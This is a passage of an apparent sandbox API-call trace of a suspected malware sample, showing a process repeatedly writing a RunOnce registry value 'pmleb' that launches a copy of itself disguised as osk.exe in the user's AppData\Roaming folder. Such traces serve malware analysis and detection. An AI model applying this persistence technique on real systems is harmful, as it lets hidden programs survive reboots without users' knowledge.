HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.072] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.072] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.072] RegCloseKey (hKey=0x280) returned 0x0 [0078.072] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.072] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.072] SetTimer (hWnd=0x20280, nIDEvent=0x201c, uElapse=0xa, lpTimerFunc=0x0) returned 0x201c [0078.072] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.369] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.369] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.369] KillTimer (hWnd=0x20280, uIDEvent=0x201c) returned 1 [0078.370] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.370] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.370] IUnknown:Release (This=0x787518) returned 0x1 [0078.370] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.370] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.370] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.370] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.371] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0078.371] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.371] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1e [0078.371] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.371] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0078.371] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.372] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.372] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.372] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.372] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.372] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.372] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.372] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.372] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.372] RegCloseKey (hKey=0x280) returned 0x0 [0078.372] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.372] SetTimer (hWnd=0x20280, nIDEvent=0x201d, uElapse=0xa, lpTimerFunc=0x0) returned 0x201d [0078.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.380] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.380] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.380] KillTimer (hWnd=0x20280, uIDEvent=0x201d) returned 1 [0078.381] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.381] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.381] IUnknown:Release (This=0x787518) returned 0x1 [0078.381] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.381] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.381] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.381] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.382] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0078.382] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.382] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1f [0078.382] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.382] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1e [0078.382] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.382] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.382] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.383] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.383] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.383] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.383] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.383] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.383] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.383] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.383] RegCloseKey (hKey=0x280) returned 0x0 [0078.383] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.383] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.384] SetTimer (hWnd=0x20280, nIDEvent=0x201e, uElapse=0xa, lpTimerFunc=0x0) returned 0x201e [0078.384] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.397] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.397] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.397] KillTimer (hWnd=0x20280, uIDEvent=0x201e) returned 1 [0078.397] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.397] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.397] IUnknown:Release (This=0x787518) returned 0x1 [0078.397] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.397] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.397] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.398] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.398] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.398] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0078.398] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.398] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x20 [0078.398] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.399] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1f [0078.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.399] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.399] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.399] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.399] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 